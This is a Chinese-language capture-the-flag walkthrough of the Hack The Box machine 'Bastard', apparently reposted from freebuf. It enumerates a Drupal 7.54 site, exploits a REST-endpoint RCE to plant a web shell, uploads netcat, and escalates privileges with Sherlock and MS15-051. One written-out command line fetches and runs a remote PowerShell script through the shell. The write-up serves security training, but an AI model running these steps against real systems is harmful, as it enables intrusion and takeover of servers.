HTB系列之七:Bastard – 作者:shuteer

shavchenMs08067安全实验

这次挑战的是 HTB 的第7台靶机:Bastard

1615123750_6044d526bb0e1ac68d747.png!small?1615123749510

技能收获:

  • PHP Unserilaize

  • CMS Version Identify

  • Windows privilege escalation :Sherlock

信息收集

基本信息

Bastard IP:10.10.10.9

Kali IP:10.10.14.23

端口枚举


nmap -A -p- -v -T4 10.10.10.9

1615123770_6044d53adb9dc115535eb.png!small?1615123769524发现开启了80(IIS),访问之

1615123779_6044d5432cfcc207db3b4.png!small?1615123778164

看起来是drupal cms,访问 robots.txt ,发现版本变更文件

1615123789_6044d54d8729c7a80417a.png!small?1615123788311

1615123796_6044d554aeb5384446bea.png!small?1615123795323

版本:Drupal 7.54

漏洞发现

searchsploit drupal 7.x

1615123895_6044d5b7c1defece15945.png!small?1615123894890

该版本存在 rce ,编辑 exploit

1615123912_6044d5c8821398af2a0c4.png!small?1615123911136

该exploit会攻击由服务扩展创建的REST端点,我们只需要找出REST端点的名称即可利用该漏洞。

1615123920_6044d5d0d0adc47fa630c.png!small?1615123919368

通过目录枚举,我们发现 endpoint 为 /rest,用其替换exploit


gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt

1615123952_6044d5f09c07e275e367e.png!small?1615123951349

1615123956_6044d5f4d1226ba4db034.png!small?1615123955547

漏洞利用


php exp.php

1615123970_6044d602d1927bbc9b0d1.png!small?1615123970475

没有反应,挂上 burpsuite 看看

1615123979_6044d60b2a1ba3a127f46.png!small?1615123977706

1615123983_6044d60fd479377550df0.png!small?1615123982540

设置 exp 的target为 burp 的监听端口

1615127489_6044e3c11e0db5147fcc4.png!small?1615127487993

1615127493_6044e3c592777bdda99a5.png!small?1615127492258

依然没回应,那应该是缺少php包,未成功发送

检查发现,Kali缺少 php-curl 包,安装好成功返回响应并写入 shell.php


apt install php-curl

1615127507_6044e3d388592e6892dc3.png!small?1615127506618

1615127512_6044e3d84e039c34e5ce6.png!small?1615127511006利用 session.json 可以伪造会话,成功登录

1615127541_6044e3f53660ae8e48969.png!small?1615127539868

1615127549_6044e3fd0005f97d0efe8.png!small?1615127548289

已知目标是 x64 的系统,我们上传 nc.exe

下载地址:https://eternallybored.org/misc/netcat/

给 exp 添加一个文件上传功能,也可以使用 smb文件共享,使用copy \\ip\nc64.exe nc.exe上传

1615127644_6044e45caeb07843f9221.png!small?1615127643194

1615127650_6044e46278eca890ce7e9.png!small?16151276492891615127660_6044e46ccc2f3ca678989.png!small?1615127659553

权限提升


git clone git clone https://github.com/rasta-mouse/Sherlock.git

Sherlock是一个在Windows下用于本地提权的PowerShell脚本

http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString(‘http://10.10.14.15:8000/Sherlock.ps1’) | powershell -noprofile –

1615129277_6044eabd10f7a1c27456c.png!small?1615129275681

提示 ms15-051 , 利用之

提权程序下载地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

上传并运行

1615129287_6044eac764be68bd7842f.png!small?1615129286033

建立 nc 会话

1615129300_6044ead41153ebb106970.png!small?1615129298865

至此完成

参考文章

Drupal 7.x RCE 漏洞分析 附EXP:

https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/

<br>

MS08067实验室官网:www.ms08067.com

公众号:” Ms08067安全实验室”

Ms08067安全实验室目前开放知识星球: WEB安全攻防,内网安全攻防,Python安全攻防,KALI Linux安全攻防,二进制逆向入门

最后期待各位小伙伴的加入!

来源:freebuf.com 2021-03-07 23:05:39 by: shuteer

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论